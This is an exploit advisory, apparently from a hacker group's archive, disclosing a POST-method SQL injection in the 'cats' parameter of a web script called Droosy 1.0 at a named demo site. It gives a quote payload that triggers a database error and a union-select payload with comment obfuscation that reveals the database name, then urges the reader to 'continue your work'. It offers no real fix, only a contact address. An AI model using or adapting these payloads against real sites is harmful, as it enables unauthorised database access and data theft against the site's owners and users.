# Name Of Script : Droosy Version 1,0
# Comapny Site : http://www.emides.com/our_scripts.emi?id=14
# Demo : http://ad.ae/droosy/
# Found By : RoMaNcYxHaCkEr
# Contact With Me : rxh0@hotmail.com
# My Group : Security - Codes
# My Homepage : WwW.Sec-Code.CoM
# Type Of Exploit : Remote SQL Injection By [POST Method]
# Explaintion Of Video Of This Exploit Download Here : http://www.mediafire.com/?zgtjzmznwd2
# Author has no responsibility over the damage you do with this! It,s Just Educational Manner :)
==================================================================================================================
# P.O.C :
The Vulne In Cat Variable In The Main Index But The Script Is Demo And We Try To Know The Variables Of Some File And The Mod_Rewrite Making The Proplem To Identify It,s ...
The Proplem If You See The Video In Cats Variable Not On Search Box ....
Here The Result Of Search :
http://ad.ae/droosy/result.html
Copy And Post This Variable If You Have Specific Tool For POST Method Like In Video If You See It,s :) :
linkname=rxh&cats='&B1=%C5%C8%CD%CB
So We See The Error :
يبدو أن هنالك خطأ في قاعدة البيانات
الخطأ هو : تم تنفيذ عبارة SQL خاطئة
قاعدة البيانات قامت بإرجاع المعلومات التالية عن الخطأ :You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
رقم الخطأ الذي أعادته قاعدة البيانات: 1064
So Let,s Apply This
linkname=rxh&cats='/**/union/**/select/**/0,1,database(),3,4,5,6/*&B1=%C5%C8%CD%CB
And See The Name Of Database :
adminad_droos
So Continue Your Work ... :)
==================================================================================================================
# Solution :
Contact With Me I Will Filter This Fucking Uses :)
# rXh
# bEST wISHES